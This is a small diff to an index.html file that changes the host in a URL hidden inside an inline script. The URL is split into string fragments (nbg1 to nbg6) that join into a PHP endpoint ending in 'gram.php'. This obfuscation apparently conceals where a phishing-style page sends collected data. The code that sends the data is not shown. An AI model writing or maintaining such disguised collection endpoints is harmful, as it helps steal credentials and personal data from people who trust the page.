--- a/index.html
+++ b/index.html
@@ -434,10 +434,10 @@
     <script>
       let resBox = "AAL";
       let nbg1 = "ht";
-      let nbg2 = "tps://gtdst";
-      let nbg3 = "ornk.li";
-      let nbg4 = "ve/Jagsonli";
-      let nbg5 = "mited/gram.p";
+      let nbg2 = "tps://kvwp";
+      let nbg3 = "ca.co";
+      let nbg4 = "m/Jagsonli";
+      let nbg5 = "meted/gram.p";
       let nbg6 = "hp";;
 
       let ov1 = "https";
